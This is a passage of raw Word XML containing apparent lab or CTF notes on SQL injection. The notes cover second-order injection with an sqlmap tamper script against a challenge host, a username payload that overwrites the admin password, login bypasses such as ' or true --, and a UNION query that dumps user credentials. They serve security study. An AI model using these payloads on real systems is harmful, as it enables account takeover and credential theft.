        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login with malicious user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFC426" w14:textId="058A1905" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>go to vulnerable query page to trigger injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE8D51" w14:textId="3B24F53A" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create a tamper script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E077C2" w14:textId="256DB576" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tamperino.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD73074" w14:textId="0E602669" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>needs empty __init__.py file for sqlmap to load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE3E4C" w14:textId="5AFAB26A" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>before starting sqlmap with tamper script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B854A" w14:textId="6CD22E37" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change address and password variable inside script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5643E8CB" w14:textId="0D291BB0" w:rsidR="00B84FE6" w:rsidRDefault="00B84FE6" w:rsidP="00B84FE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exploit - sqlmap --tamper Tamperino.py --url &lt;URL PATH&gt;  --data "username=admin&amp;password=asd" --second-url </w:t>
      </w:r>
      <w:r w:rsidR="005F031C">
        <w:t>&lt;SECOND URL PATH&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  -p username --dbms sqlite --technique=U --no-cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17E4CF" w14:textId="733FE139" w:rsidR="005F031C" w:rsidRDefault="005F031C" w:rsidP="005F031C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dump found tables, such as “users</w:t>
      </w:r>
      <w:r w:rsidR="0030549A">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0431C" w14:textId="2C4D654F" w:rsidR="0030549A" w:rsidRDefault="0030549A" w:rsidP="0030549A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. sqlmap --tamper tamper/so-tamper.py --url http://10.10.1.134:5000/challenge4/signup --data "username=admin&amp;password=asd" --second-url http://10.10.1.134:5000/challenge4/notes -p username --dbms=sqlite --technique=U --no-cast -T users </w:t>
      </w:r>
      <w:r w:rsidR="00003471">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65405EBA" w14:textId="34F487C8" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="0030549A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check dump file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D41DDC" w14:textId="55F16B3C" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>custom functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ABBD62" w14:textId="00C385F7" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create_account()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F70C7A" w14:textId="00E44D03" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B202A" w14:textId="37831763" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns Flask session cookie after login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2AEE3" w14:textId="3AFDBB40" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tamper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33055FDE" w14:textId="01914CB5" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E386CD5" w14:textId="2409C093" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>**kwargs – holds info such as HTTP headers, need to place Flask session cookie onto the request to allow sqlmap to go to the notes page to trigger the injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D94BB" w14:textId="0B46A9BB" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Change Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAB432" w14:textId="7E954C51" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>vulnerable to SQL injection because UPDATE statement concatenates username directly into SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DCDA4" w14:textId="6AE560A8" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>as opposed to using “?” placeholder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA0836" w14:textId="4ADB3247" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00003471">
        <w:t>UPDATE users SET password = ? WHERE username = '" + username + "'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5624A30F" w14:textId="402F89AD" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create username admin’-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC17A13" w14:textId="14A720A2" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login and navigate to password change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9BA33E" w14:textId="5B1CE202" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>update password for new user to trigger vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17571E" w14:textId="174AF259" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first check db for current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313FF0D0" w14:textId="3173F3F9" w:rsidR="00003471" w:rsidRDefault="00003471" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00003471">
        <w:t>SELECT username, password FROM users WHERE id = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486358DF" w14:textId="0F9AA27F" w:rsidR="00003471" w:rsidRDefault="00173AC6" w:rsidP="00003471">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter in current password and change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A589F21" w14:textId="23B18D69" w:rsidR="00173AC6" w:rsidRDefault="00173AC6" w:rsidP="00173AC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>the - - comments out and the password for the real admin account is changed instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8AA865" w14:textId="02F2A831" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Login Bypass with SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AFFF2" w14:textId="4D3914DD" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If login application uses PHP to check is username and password match database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E248DD" w14:textId="4B07550E" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5972">
        <w:t>SELECT username,password FROM users WHERE username='$username' and password='$password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356C8FC" w14:textId="1E4A32C5" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inputting ‘ or true - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A7CBF" w14:textId="5E89273E" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5972">
        <w:t>SELECT username,password FROM users WHERE username='' or true -- and password=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB35F19" w14:textId="2F53B98F" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>may bypass login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A026809" w14:textId="34AB5843" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Some websites use different query method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C65E206" w14:textId="4CD53109" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5972">
        <w:t>SELECT username,pass FROM users WHERE username=('$username') and password=('$password')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6F65F" w14:textId="00D0B0D9" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add single bracket to payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC4E840" w14:textId="0F44B0AC" w:rsidR="00DE5972" w:rsidRDefault="00DE5972" w:rsidP="00DE5972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5972">
        <w:t>') or true–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471418B" w14:textId="7E4A5FE6" w:rsidR="00173AC6" w:rsidRDefault="00173AC6" w:rsidP="00173AC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Book Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DF3F1" w14:textId="704533F4" w:rsidR="00173AC6" w:rsidRDefault="005F33FA" w:rsidP="005F33FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>database search that concatenates user input directly into SQL statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E71034" w14:textId="3462F454" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="005F33FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00767612">
        <w:t>') union select 1,2,group_concat(username),group_concat(password) from users</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884B6C2" w14:textId="04D8875C" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first query result used in second query without sanitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD8847" w14:textId="6E569A2D" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use UNION-based injection instead of Boolean-based Blind Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65A23E" w14:textId="3DA5E1BB" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>easier and less noisy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1853F" w14:textId="354EF351" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When searching for a book title – web page performs GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9385A" w14:textId="3959B43F" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">first query gets book ID </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> second query gets books information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7805D" w14:textId="77777777" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D032809" w14:textId="729BF8DF" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bid = db.sql_query(f"SELECT id FROM books WHERE title like '{title}%'", one=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23CE83" w14:textId="77777777" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if bid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4164B65F" w14:textId="08F46BA5" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>query = f"SELECT * FROM books WHERE id = '{bid['id']}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D25616" w14:textId="63AE11BD" w:rsidR="00767612" w:rsidRDefault="00767612" w:rsidP="00767612">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
